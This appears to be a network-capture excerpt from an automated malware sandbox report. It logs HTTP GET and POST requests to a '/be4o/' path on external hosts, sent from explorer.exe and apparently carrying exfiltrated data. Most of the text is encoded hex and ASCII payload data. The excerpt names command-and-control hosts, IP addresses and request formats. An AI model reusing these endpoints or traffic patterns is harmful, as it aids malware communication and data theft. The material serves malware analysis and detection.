Dg4aMd1sGZxk9E8kwtv43ax7n6JZSRgP4VdEtFJ_hR8cQ10RFn5PLK4rceNHRH8PWqPj6y2KKJTCT91dQoB-u5jwbj~aPNcX9Q1LX5SWF7jZfWY4(CrNs7H9X3rzPDCRDMsNR2G1mWElGIAKwvHg~JX2WfDxji4kiStUJMTFxFzW7f9FQAJPLMIrCP42bodGHbBfL4R2QwxCfA8DosTpcvS6cjfwHnXvgypQ(Jz82jT8KRBd5vmNRe2k5ONHRJ2ICMaspZrN0FtT998539H6fCQA(rb5y5CTeHpA6D37IQVHA5iZYfxeT2U6oNirRlNDutyV1FWCuTODORBFjDtUQL4jKT5SAox7jOBtyAeddX8WqVn3ms(wglhOkBBcRM9eCyZIJgTNPckWCt6F26iOqb5oZLBgsSRGp5XIxkMLCxROiXOMgqbathjoXPfgKEC89FO_imBeAg8zD33jdujcm6Gz(ahHPubIm2HRpkiCf_bo4Al7CRePkFz_4nkrplvpQyRtIWJ0gcXJE08-wUQycKU25OljKrAbrdJcZ2Wh45f_RUX5F9tOEj7_7K8MokSX6qvYlBmWtqZqZzhT~9tyJHz0M5mJWDgBYUAx6Qh1DQ~03utUYAPHkQ(z7r6A3ij7XIaX5zsPp9nauYd3K4lqBWuD4WwrZhnmUYPDxovvHBswkLnCWgfi~NcEtIdixoWUQAmqeeQF0C4glGt2109K2-Gd74BWPAG3sqBHFl0NI7FdHWsomQrH1uy3ErCKQuE02xnV3S2lC-JoyZvIGoNpPQPRUm2HxcwITHnM9CWqFTUu~4zkr3NL9yvcVpcVtxxpJdk6oef_Q3SF8K9kICo4mrV4(9xB41eUu8GW3R7sVe(Fj1y30odd~XN3Rmf9HMlygxxXtHATEy~atOwgowwjoBBIHEFz3isfLnJM2R68~177LkC0u7rOodW_TTnDlBXO4ecQkEXAHOcgfsvvtoz9kfn0NUY5XcwP0TDHlVOfSYJ8ybZKyD~zbQS419j4SXqkNAptJ_Ew0S7RsnoIqF9tliusg5JeT4nm~YXyP_sPChEe08GUk6fLXo1sUNCpQI(1BFE0I8Jg9B8UY-ZqjjV8xRmf04M3KLLe4dp_rqwayrjUeMoEZ5RMCeXdd5NZQJ5y7l5fYpLettnveCCk
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.389100075 CET10824OUTData Raw: 46 37 41 59 45 62 72 6b 65 62 70 73 43 52 2d 31 63 46 43 79 55 5a 70 46 53 70 54 47 4e 59 53 4c 38 6b 6c 46 38 67 6d 75 2d 76 35 51 33 4f 58 67 36 46 32 55 33 46 2d 51 6d 51 63 76 69 75 69 74 30 78 72 7e 57 28 6b 31 6c 41 41 4b 73 66 46 72 46 30
                                                                                                                                                                                                                              Data Ascii: F7AYEbrkebpsCR-1cFCyUZpFSpTGNYSL8klF8gmu-v5Q3OXg6F2U3F-QmQcviuit0xr~W(k1lAAKsfFrF0JRoV3zoNwJwNNdC(DIMhWqJywrxoIERxW1unnWcI4cAJDSfb3VzcytNOy1QBueWF9z_KVi8HHfcUqRq5-FdQlnW8ozFi7Y7xep5cAUsWsqDsvXHSu8WbL9cmnh8qSCspnej5FVoli06n2g2g0T2YlRkFcB7VBz7Xt
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493357897 CET10826OUTData Raw: 68 39 6c 69 36 48 5f 4d 6b 47 48 70 49 71 61 4e 38 69 69 47 75 4e 50 35 66 72 4f 30 34 44 45 50 37 4b 4a 4e 47 42 4b 7a 44 47 39 69 38 57 31 79 4a 58 65 30 47 34 33 62 71 38 4b 5a 65 46 50 34 77 43 72 62 49 4d 34 47 5a 59 36 4a 58 71 5f 58 78 43
                                                                                                                                                                                                                              Data Ascii: h9li6H_MkGHpIqaN8iiGuNP5frO04DEP7KJNGBKzDG9i8W1yJXe0G43bq8KZeFP4wCrbIM4GZY6JXq_XxCo9YY6jR~H6tyQxQT7tmfOuxim7n4TAa8q7Q(o6Jt-zsWSKXdJ7eDgqipBshAA6l2PadVkVIEt(wvXOxVU0d7x7XCS9bkjzJhOXwvMW0bKGMZKHjxwGJKENyun8VfKipDPEzb_61(hz8fV5MM2F98AXRyFyvnUgPwI
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493410110 CET10831OUTData Raw: 6f 77 65 76 6d 6c 4c 35 57 76 6e 35 59 6b 4d 41 33 75 35 6d 4a 56 32 72 74 73 63 67 36 4d 41 6d 76 43 31 5a 78 36 56 6d 47 4b 50 57 4c 73 32 30 67 6f 61 54 4e 55 6d 44 35 6f 54 36 75 6d 5a 73 55 74 49 51 50 28 51 6a 41 6d 6a 69 47 51 54 53 76 4b
                                                                                                                                                                                                                              Data Ascii: owevmlL5Wvn5YkMA3u5mJV2rtscg6MAmvC1Zx6VmGKPWLs20goaTNUmD5oT6umZsUtIQP(QjAmjiGQTSvKZxuU4xFpStkzOijwut_iUoQzRU0iHjfekpUZePxQhxeWy0ikDY25HZe8VkblO0w3NHRlbG8ozgXpxddNRgxkUgC5Q0Whzr55zpYA8zsAQueCA0hiGCMnmxMxXBl4xQP6S2WMG(OnzKSbFLHm4b9Q5ktzzdyL-Rol-
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493463993 CET10838OUTData Raw: 48 50 65 6d 72 30 77 67 75 65 37 76 5f 34 4c 77 4a 73 64 4d 66 4e 78 4d 65 52 63 38 5a 68 42 35 58 71 30 4b 77 41 6b 57 70 4c 6d 34 53 49 73 7e 41 78 72 39 37 69 7a 34 66 34 4f 51 2d 5a 54 6d 62 6b 66 70 6f 5a 63 6f 75 30 63 50 65 45 48 33 74 53
                                                                                                                                                                                                                              Data Ascii: HPemr0wgue7v_4LwJsdMfNxMeRc8ZhB5Xq0KwAkWpLm4SIs~Axr97iz4f4OQ-ZTmbkfpoZcou0cPeEH3tSYsqkq8b8OtGmHfh1PLpCmAXb_rEHqB_ILgFu-Lyc1NWgCxf3WDIl3XaRFTsZ6URE3iGHu0GM1tqLhckM2A5Z06-TqbbZmCb4mDpAjAApit4qnP7c6jCeLVS53vZRXO2glGUgg3W8PY7XxgeUJ8lJGVwxn5won5zyt
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.493649006 CET10851OUTData Raw: 35 6b 50 66 65 43 46 49 75 64 39 32 32 57 57 68 50 4d 75 68 73 55 6a 57 72 70 36 37 4a 39 33 39 54 64 74 67 31 61 36 64 61 74 48 45 36 47 70 77 65 46 50 45 4a 76 55 4c 78 6d 59 37 53 41 67 61 44 4f 6d 51 45 72 66 71 59 74 53 50 69 51 77 34 43 6b
                                                                                                                                                                                                                              Data Ascii: 5kPfeCFIud922WWhPMuhsUjWrp67J939Tdtg1a6datHE6GpweFPEJvULxmY7SAgaDOmQErfqYtSPiQw4CkkVFU-VYeyCSzx6j8d4Gc1lmTpmO26wook8bYyciE8YjkqGS55B4P0JM7NgBhZ9gImfCI1oeQeGE5Jniy3DMmD5P2spkVyHDYRV5ON2ah5cSAyw7Xfj9ei8-8nB2uuwG8xzotYm1zWpldp4gamQYgpIL0XLjwp1JPv
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.594508886 CET10854OUTData Raw: 4e 71 6e 44 57 37 49 30 53 6f 55 7a 79 4f 71 6d 64 38 62 7a 4d 6f 56 71 6f 74 6d 41 52 36 55 38 69 76 6f 49 32 61 64 5a 71 38 79 44 53 38 51 79 64 59 74 76 4d 4e 4b 71 64 4c 2d 74 4b 6d 5f 75 43 46 6c 58 31 75 7a 52 4e 34 63 77 48 69 38 43 6e 47
                                                                                                                                                                                                                              Data Ascii: NqnDW7I0SoUzyOqmd8bzMoVqotmAR6U8ivoI2adZq8yDS8QydYtvMNKqdL-tKm_uCFlX1uzRN4cwHi8CnGpD5NaDQd8n58I1uo7kGmPjFDvG2E7riyf6k2anj7RINOI61mkEGndR1VlU3vVJCb52PjixpSwZH~cuTWZAshasW655UX_RgzRZWbPFxswboywPJRBaW8r2QFP3Bd67khK4QLDkNmuZiuR1qnfF92zWUnWXo2JvLhr
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.594599962 CET10857OUTData Raw: 77 41 61 31 76 56 4c 53 56 51 68 54 47 54 76 72 44 42 66 6d 46 67 2d 34 4e 6c 55 39 67 34 43 55 46 4e 4d 39 31 28 30 55 42 41 41 38 6b 51 4c 64 30 56 42 39 76 6e 36 71 32 6e 74 69 52 37 49 71 5f 45 44 72 47 4f 63 49 33 67 4c 5a 74 45 66 75 78 61
                                                                                                                                                                                                                              Data Ascii: wAa1vVLSVQhTGTvrDBfmFg-4NlU9g4CUFNM91(0UBAA8kQLd0VB9vn6q2ntiR7Iq_EDrGOcI3gLZtEfuxaRMq6W~p(tSIjynOhXHVSFjUPumWAF7o38t_mjsPV1GhrXZJF3G7aJcouw7qjBEnVUZFUFOFJk4OdJuIUP5Z1RN9Ptzx2ohDAOMivM(MuDikqVp05PpkXtjJae5eql61nr9G6KaB7EgOTyLkq1sKANHP(qnsv7UL2e
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596560001 CET10858OUTData Raw: 44 69 30 54 62 6b 78 6f 68 52 70 42 49 4d 6d 77 59 54 33 75 76 4e 70 66 6f 61 65 54 50 66 73 47 69 6e 39 34 6a 49 7a 4d 62 67 39 39 78 54 72 70 72 6d 62 4a 57 64 2d 44 42 4f 44 30 53 6e 6b 66 4a 4c 66 7e 30 6e 73 41 72 4b 34 58 78 66 66 39 56 52
                                                                                                                                                                                                                              Data Ascii: Di0TbkxohRpBIMmwYT3uvNpfoaeTPfsGin94jIzMbg99xTrprmbJWd-DBOD0SnkfJLf~0nsArK4Xxff9VRQjhk_4QNrAa7xXKckwAzuYgpxV4oV2Xp5zC0l9-mOWD5WefvK2MCj6bNyY2(X6lAb2s87Nm653uGeNQDJX_ElCW~WaeZzTuVNgl3IXWiOpsrK(7Tw5K3U2JY7Hs0KMF6YP-AghKp10k1JAP8tP2N2DGHTAL6o7kLY
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596759081 CET10869OUTData Raw: 41 41 66 76 45 41 36 59 45 5a 5f 59 79 7e 5f 6a 57 71 47 44 5f 63 49 4a 4b 28 7a 61 37 56 71 6e 55 72 46 7a 6e 49 54 46 33 63 77 4d 5f 64 74 59 44 77 38 45 4a 30 6b 5a 7a 57 64 76 55 6c 46 36 77 53 52 65 4c 34 45 45 6d 72 53 51 4c 7a 78 38 76 61
                                                                                                                                                                                                                              Data Ascii: AAfvEA6YEZ_Yy~_jWqGD_cIJK(za7VqnUrFznITF3cwM_dtYDw8EJ0kZzWdvUlF6wSReL4EEmrSQLzx8vaKFbNfFpBjVbeTm77YZmUq0GRs8Seg1t6SIbCz8xHSRhafCoL8GVbJYt0Nwv76M-k6inedV_0SdsqAU37JHxwN6afAmEsGRZaRsmJ_XuQ789pfg7GPs7XCkcq75TkX(-aKyC1Jjihg2lwd2D92ItMxFqbE~-QNsNQ5
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.596940994 CET10892OUTData Raw: 59 70 46 46 56 57 76 76 7a 6d 58 4b 46 75 48 52 52 6d 66 59 72 4d 39 79 78 63 39 31 5a 62 49 57 49 76 68 77 4d 6e 6a 7a 33 32 66 75 69 33 54 44 4c 6a 6f 51 53 28 31 4b 34 30 62 7a 76 6e 45 71 33 36 4b 37 43 76 5a 78 6f 50 5a 69 33 7a 32 65 7a 6c
                                                                                                                                                                                                                              Data Ascii: YpFFVWvvzmXKFuHRRmfYrM9yxc91ZbIWIvhwMnjz32fui3TDLjoQS(1K40bzvnEq36K7CvZxoPZi3z2ezlcILYRnKrg9djcMHzrMUr0s-BsOZjlHIwYjrebTaYPK7IZEFMRMdTkLkMfHdtGZbT69kXVz06NKlq_NQnErlfWbPeOvnh1kg9tqFdACUVJYs4gzW2C6v3f6-O2YLORxVLefQM_d7rVUSFbIvGY81PSREty71OmSFZZ
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.259237051 CET10988INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                              Location: https://www.dreamintelligent.com/be4o/
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:49 GMT
                                                                                                                                                                                                                              Server: LiteSpeed
                                                                                                                                                                                                                              Vary: User-Agent


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              47192.168.11.2049846185.190.39.5280C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.487391949 CET10824OUTGET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.dreamintelligent.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:55:49.019653082 CET10987INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                              Location: https://www.dreamintelligent.com/be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:48 GMT
                                                                                                                                                                                                                              Server: LiteSpeed
                                                                                                                                                                                                                              Vary: User-Agent


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              48192.168.11.204984934.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.026768923 CET11020OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.josiemaran-supernatural.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.josiemaran-supernatural.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.josiemaran-supernatural.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 53 71 49 7a 42 66 4d 6c 48 39 65 54 43 50 75 62 63 50 34 6e 6c 54 52 44 30 33 78 78 7a 62 38 35 44 37 49 44 68 35 37 62 6c 5f 4c 51 73 33 4d 62 6e 44 6b 75 6d 4d 31 6a 30 6c 4f 33 72 59 47 39 67 4c 6b 35 69 65 36 53 50 35 37 53 4f 6e 79 55 33 32 79 75 34 77 5a 77 7e 56 70 57 38 64 57 33 54 71 61 36 53 4f 55 4c 71 52 74 79 78 6b 4c 53 57 54 6d 57 43 5a 34 75 30 65 49 4f 72 6c 54 30 71 55 38 47 75 30 54 30 56 50 72 61 77 6b 68 38 4a 52 56 47 67 6c 46 43 7a 30 7e 6f 30 73 50 77 68 2d 33 48 52 31 75 70 7e 65 46 79 76 4f 31 68 71 47 6c 57 33 6a 33 5f 57 4b 72 30 42 4c 5a 72 4f 50 51 50 5a 6e 34 62 4d 68 64 6c 62 55 7a 5a 36 57 58 52 49 6e 65 77 28 35 49 54 53 31 30 38 45 36 7e 33 4c 41 6f 2d 4a 61 5a 4c 4b 67 31 4c 6c 56 76 31 55 43 70 7a 61 35 75 30 68 52 67 62 45 45 77 6d 43 33 67 55 31 73 6a 64 30 53 61 42 47 54 4f 61 32 4e 6e 67 71 53 71 41 38 45 52 55 61 7a 65 6a 72 5a 39 58 4d 45 69 79 42 4b 76 36 4a 7a 6d 5a 4d 59 44 35 55 42 7e 53 53 76 43 5a 74 34 6e 4a 45 71 30 43 56 77 68 6a 33 4c 49 2d 54 46 46 58 28 65 31 56 56 42 58 47 73 54 53 4f 50 43 47 78 67 32 28 47 78 4a 32 4c 58 68 44 6c 52 63 75 4c 6d 31 54 36 32 64 6e 6d 49 48 67 61 53 58 59 4b 6d 5f 67 78 4c 6b 31 5a 4b 76 33 49 42 38 75 43 51 38 5a 50 65 6a 53 4c 43 6f 61 42 6e 30 48 49 6b 35 6a 46 72 38 56 4e 31 77 4c 64 49 48 36 57 49 76 33 4b 77 4c 41 61 7a 5a 76 64 50 4a 47 55 45 73 6d 61 38 64 59 4b 59 56 69 64 4e 72 64 79 71 77 32 33 7a 30 51 6e 4f 43 42 39 67 6a 54 43 54 77 54 70 72 52 5a 69 7e 65 7e 5a 37 34 50 45 6e 62 6b 69 67 62 54 32 51 53 74 74 66 4b 65 62 47 5f 77 73 31 50 76 74 6f 61 4b 79 6c 75 78 56 5a 4a 47 5a 41 61 4d 59 36 30 56 45 4c 45 79 76 33 55 78 73 36 36 6d 55 39 57 30 70 5a 37 67 39 62 54 58 66 46 33 67 34 59 33 33 39 6b 35 59 65 4b 52 61 46 71 33 7e 48 74 5a 74 6c 6e 4b 77 4a 46 52 55 55 34 6c 4d 56 37 6f 41 65 54 6c 32 2d 47 38 30 4c 42 6f 5a 73 76 4a 56 42 77 44 28 46 61 30 59 34 54 61 7a 6c 45 34 34 4d 43 31 75 36 49 54 36 52 64 44 47 51 53 6a 4a 39 65 68 66 6f 35 33 6d 63 33 33 76 35 77 6c 59 4b 76 39 68 4f 50 70 41 45 4a 43 66 5a 73 65 48 45 6d 43 7e 42 66 49 4c 37 35 46 7a 44 59 59 67 6d 30 43 4c 49 6d 6d 59 58 56 59 64 6c 52 76 49 37 45 6d 6b 75 49 46 78 44 6c 46 59 75 6c 57 61 54 4f 68 63 37 28 70 61 68 63 2d 63 6f 37 52 34 78 31 65 4c 51 31 34 51 76 69 5f 4f 4e 62 41 69 68 42 43 33 4f 4b 70 35 44 71 6c 76 4a 35 41 47 4a 4a 58 30 62 63 56 64 57 6f 37 44 30 50 4a 61 58 34 64 50 4b 6d 62 77 54 4a 79 55 46 34 7a 76 63 72 69 4f 65 4e 70 55 6f 6c 56 70 75 43 6f 64 37 31 64 6c 34 64 48 62 4d 48 33 4d 6d 41 48 31 70 4e 47 7a 4c 44 43 4e 30 59 4e 36 41 41 52 56 39 52 55 45 68 4f 68 74 5a 32 2d 53 5a 38 51 77 70 35 77 69 36 75 75 53 67 43 55 75 37 4b 37 7e 69 62 6e 78 4c 54 34 48 77 62 4f 43 45 63 44 68 73 78 33 31 39 32 58 76 72 43 30 4c 36 53 78 6c 71 34 4a 39 6b 61 4a 77 5f 73 6f 59 5a 79 67 45 57 41 62 54 47 78 73 7e 54 32 38 38 6d 74 5f 67 78 44 4a 76 4e 5a 78 65 68 6d 76 57 46 73 36 61 62 31 41 41 35 34 2d 37 44 70 54 28 74 42 74 78 4f 30 55 72 44 53 75 63 7a 35 78 7a 31 36 57 71 5f 36 50 50 6b 58 4c 4c 75 41 34 54 43 68 66 4e 41 73 50 59 39 71 7a 41 72 45 57 48 57 72 70 37 45 79 55 35 6d 59 42 42 6f 6a 6b 44 61 66 47 59 2d 68 6b 4b 38 54 6e 47 38 77 7a 49 33 39 32 42 6a 77 43 45 79 68 33 72 68 47 59 51 6f 4f 50 71 71 70 56 37 70 33 5a 6a 4a 45 39 73 35 76 42 72 71 68 53 73 44 76 72 4a 57 4a 42 4f 35 62 37 32 32 37 67 73 69 59 42 6c 6e 6f 4a 5a 47 35 63 6c 4d 75 52 28 4c 37 6c 52 70 62 58 51 6e 30 63 31 62 54 6c 43 43 73 6c 62 52 6a 51 53 4b 67 4d 38 49 6a 61 67 56 6c 6f 77 57 50 5f 48 4c 38 6d 30 58 6f 6f 39 6f 62 76 62 37 4e 48 63 4b 59 50 35 6f 6b 31 4f 47 39 4e 58 36 66 59 6f 39 76 48 54 5a 4d 6b 74 36 5a 53 4a 75 66 36 64 6b 66 69 71 6c 47 67 39 47 5a 46 6a 72 7e 4c 43 47 4c 33 70 6b 65 45 51 4b 72 53 4e 37 44 54 6e 6a 65 77 36 4e 46 4b 38 6c 4b 31 70 48 6a 43 30 4c 4e 54 4b 4b 4b 34 46 5a 75 6d 70 69 36 36 37 79 43 43 43 76 34 34 62 76 36 32 39 59 4d 59 78 74 6e 32 54 4a 31 78 64 6c 4c 33 48 46 33 66 59 34 56 56 70 72 64 64 6f 44 65 48 78 70 69 75 5a 4d 4e 48 58 4a 76 38 39 39 43 6f 4b 74 4e 77 4b 59 4c
                                                                                                                                                                                                                              Data Ascii: h48Hl=SqIzBfMlH9eTCPubcP4nlTRD03xxzb85D7IDh57bl_LQs3MbnDkumM1j0lO3rYG9gLk5ie6SP57SOnyU32yu4wZw~VpW8dW3Tqa6SOULqRtyxkLSWTmWCZ4u0eIOrlT0qU8Gu0T0VPrawkh8JRVGglFCz0~o0sPwh-3HR1up~eFyvO1hqGlW3j3_WKr0BLZrOPQPZn4bMhdlbUzZ6WXRInew(5ITS108E6~3LAo-JaZLKg1LlVv1UCpza5u0hRgbEEwmC3gU1sjd0SaBGTOa2NngqSqA8ERUazejrZ9XMEiyBKv6JzmZMYD5UB~SSvCZt4nJEq0CVwhj3LI-TFFX(e1VVBXGsTSOPCGxg2(GxJ2LXhDlRcuLm1T62dnmIHgaSXYKm_gxLk1ZKv3IB8uCQ8ZPejSLCoaBn0HIk5jFr8VN1wLdIH6WIv3KwLAazZvdPJGUEsma8dYKYVidNrdyqw23z0QnOCB9gjTCTwTprRZi~e~Z74PEnbkigbT2QSttfKebG_ws1PvtoaKyluxVZJGZAaMY60VELEyv3Uxs66mU9W0pZ7g9bTXfF3g4Y339k5YeKRaFq3~HtZtlnKwJFRUU4lMV7oAeTl2-G80LBoZsvJVBwD(Fa0Y4TazlE44MC1u6IT6RdDGQSjJ9ehfo53mc33v5wlYKv9hOPpAEJCfZseHEmC~BfIL75FzDYYgm0CLImmYXVYdlRvI7EmkuIFxDlFYulWaTOhc7(pahc-co7R4x1eLQ14Qvi_ONbAihBC3OKp5DqlvJ5AGJJX0bcVdWo7D0PJaX4dPKmbwTJyUF4zvcriOeNpUolVpuCod71dl4dHbMH3MmAH1pNGzLDCN0YN6AARV9RUEhOhtZ2-SZ8Qwp5wi6uuSgCUu7K7~ibnxLT4HwbOCEcDhsx3192XvrC0L6Sxlq4J9kaJw_soYZygEWAbTGxs~T288mt_gxDJvNZxehmvWFs6ab1AA54-7DpT(tBtxO0UrDSucz5xz16Wq_6PPkXLLuA4TChfNAsPY9qzArEWHWrp7EyU5mYBBojkDafGY-hkK8TnG8wzI392BjwCEyh3rhGYQoOPqqpV7p3ZjJE9s5vBrqhSsDvrJWJBO5b7227gsiYBlnoJZG5clMuR(L7lRpbXQn0c1bTlCCslbRjQSKgM8IjagVlowWP_HL8m0Xoo9obvb7NHcKYP5ok1OG9NX6fYo9vHTZMkt6ZSJuf6dkfiqlGg9GZFjr~LCGL3pkeEQKrSN7DTnjew6NFK8lK1pHjC0LNTKKK4FZumpi667yCCCv44bv629YMYxtn2TJ1xdlL3HF3fY4VVprddoDeHxpiuZMNHXJv899CoKtNwKYL7dwOvVwPdKZSVZPu3erB2Gw9nNf6usVsTcyYuS0Xzna5LUGA8Qe8e2f9kVv6VYfsJ~MsvodoWrOkqrCtFiEbDD5(VUCuiMLNdcsYxuZvuSygNP46DcQxZq-tqJBvOLoZd75ZWAvQny2gjnZK6QOA1oKekqrHSQ7FIzuh_WIuY0cbXCNbhoNV0vawuB2Y3vLqLocVUmKwCNbbem2nJzRVMB1h2oGYM~007eFrJEKecjCNtjT6ifznxtWHJ81yDxarPNMF_AB0J3Ylh0xIzNlr498EMUT941dd4h2n77bN0fMH1GRmGvJh9XDtkHXjnwLdVBFzpTmEL(2HnfAUwllQoUz1fwLKIgOOjaK(jHByragOzwaJwm3OH(udtwO1d96n8POjX8Pp-Xu5JHhmmUyQ0oG44QF7BejAIh9n5LQ(DwjI7dUQNLC(R0wWkCwGsw1BWwsXDY4SSuyHj~Hbsb-CqTLiRN4lAIwdLN1KT11S9o_YtJ247ZW4JS15DGBgvLCqyrv(233OD8PKORBoO58wrjkjs03cf6WFPT6Mq8hkfbx48rrNYtWhGvD13HMnnr4Z4cJVfmdedhQjpXxc4Cr5aWTMtYD2KaNlBOWwtv_dwqbxYP2g_6-iUneltdfqcV9wACCCN5DKhKiPC4JJjo96U6FbYoPn7dOH_JDGcXKEBrkyMcba09SOMzWDts4DboTp5R0FrfnhfoTzceaeFKM590wuaeIv-wBPn69Q6(rYb4aUY9yPIjsjU3uCHR23_EgceZvX1auOQjfz8HqHTvNsAYyOoBib36JqrIVClDjhOdPMyludZlHsJPXGCupaMEhcJaCiTT3zxe7HYxJE2fGUZKGBWqL26hPo7GDXoNVkheE~tBMOxwlyadDPc7gMVAgyG4-6eSs35NrPghQ2ZsF84x_RBq3CZRtrHBiPK~Epjr2dJ(UTnR5iSfLaR2KCrchwOohzWM1lj8nKfkCFJN12ubkpJbZ2DRUiDKkClnYYVgo0Mayp-77r-L-ygE31aGWFn3jRin9n3RQcoT9c4~vMZEXjAXYwphxZiBwqKSKHT5WsD4FcFU97DiaX1V4XUnxMF~etPt6256eMyeH39Lmj_KB7MJAGxGXBm7VxGA4(5HHi5LBKdITTLU9Ohv_~UWu7eBlRD(o8V0J501L0XyQvTq9300b(6zTWFyQUroq~zfpqaE3kvFSoxJs0NdysQHlK886tA0rlkJ80DWVRnswWxg-UYJXZL1uNXkHYUKvO3j06T(nJMoH2qRgLjQfCzg_ekPp1jzHJecRTbluh3I_ZY8hjoj5zCrf9lz0G0bfRSDrbPkTFG(TjdR5rGhcN3(RSApROeMRHk9pKQxVKiR8PiTkEcxrgtmjQc11XYv3LB9SNyn1MP3qsZQa5xyytswCfq7ZT6r2teB1OILREQ83QufxnXbVcuqf(uUy09w14nJPaSdnU24SZetLp-OZig7AMQNn9zzNFd2_wBOHWukNR1wBVdbgZeYKo3dMRph-dVS5uUWseC~41P1szj~bHdRR3581fJ63A0~UpFk4YcXH1e77l8Ew6oxbGJV_8dbRmwb9XqWeCNci6Dseu5iGz3cKBMXGZxGUAat_untFjsj8x7E3fsOzpCZKjxz1RfxXrTdf0RNw2aUlDPoUoIKxWfSGbLeNtfwF~bnHk4Q4~6UgXcE1vjmJgZdRSK65Blo2udcSAyXvAf7CpL7EDrGZwaJquzD60zwjMomsZzbo~vkwr7GIaO44U9StrFVjgFwUnpbmkRmYng050BFZp9q6MNgTYqSWOnj8Fd5QT90vYiFVjKkpGrQh0QShRB9pZ6zWSeV4Q5wuV8E4CSJlcjN0qtW-V31R0HABzo0YOJJGs7mjy-TmelovLkJgncpk2Y6qCuzDWxPAQWpJhhs4qZ~5i_jbqFZg5n28YTo4yMXYf0ZuyfZUBkivOlwEQThYoLzUKktgDOthqxEAIgWgDJtCpiEey1IEIfYmCm1S6429570sV2QaKBLoIcAfIwGp9LMGOnysjfnm4zEnWehZATT4lo8uqlIOxLlgGEsb1yEPrwpAR-3_e1oqQmk9hPHrfQjrCTiIOfsd(ARRKuHosEcgGM9uXLhuRE1rt9rreBPueUIEnpZWCuTnEvDqrMsZf9ZWL1lj8XmV(hsZLk6F~XvYm4~IhG3_dR(Nu2(sy5HfkNA7Fi2AdDFwdVzGEiW1Vfbf7x3NTjyJ3Sh1tYPHGaH_CukfZHN-99ipy8x3~h7Mhbg_I879yYstt2CbW5e4CFmGfvPG8tHcpCUCgOaMwjhPy_GmNt4SBD9-SIYuUPQvZ_YyehaFi5s9GQ0xW3~_P3k1UxzwxGtyfhGcxToYGajWpu7F7NcMSoDQSxEsSsaSrmNwzF7bw8L6TQtU1vxnMXDV9NQ4qmu5Q0(b2dfi5l73Xqo_(2X0trb_Ivm0zwXNi3wSm0qiPKucHONdi9OyCieBCQ3R6mOxfdteSAh8qLssvg4M4dUH1EB7ydHt9qiTfNQVG7ciclUrCctfB3p6ly7XAhCEg7(j3A79eMp_5IUKhFq_x29HrE0Bw2e1LTl2cuJNz1WZfTanvSBdqq0Ih3yW0k~KajtI8yz03RGteghnYghUUIt5YWWj7184g6cPIRZazOmPamyuBiIiqjbRywtbl4nNS6L-CtvgOXhR2Yb1GuNVyCOC4lAJSE7ay3o97whs(3XO9drv(sKn0s0S
                                                                                                                                                                                                                              Feb 21, 2022 16:55:54.026856899 CET11026OUTData Raw: 64 61 45 57 62 55 38 57 77 38 54 6c 78 44 30 38 6f 2d 4d 6e 34 5f 70 53 41 58 6c 4d 6a 35 51 2d 52 78 7a 63 61 53 37 46 45 77 4e 65 56 58 45 69 52 72 71 37 48 78 47 53 61 41 32 6a 74 37 63 74 38 59 78 4f 62 57 49 61 52 69 47 52 4d 2d 31 6e 36 71
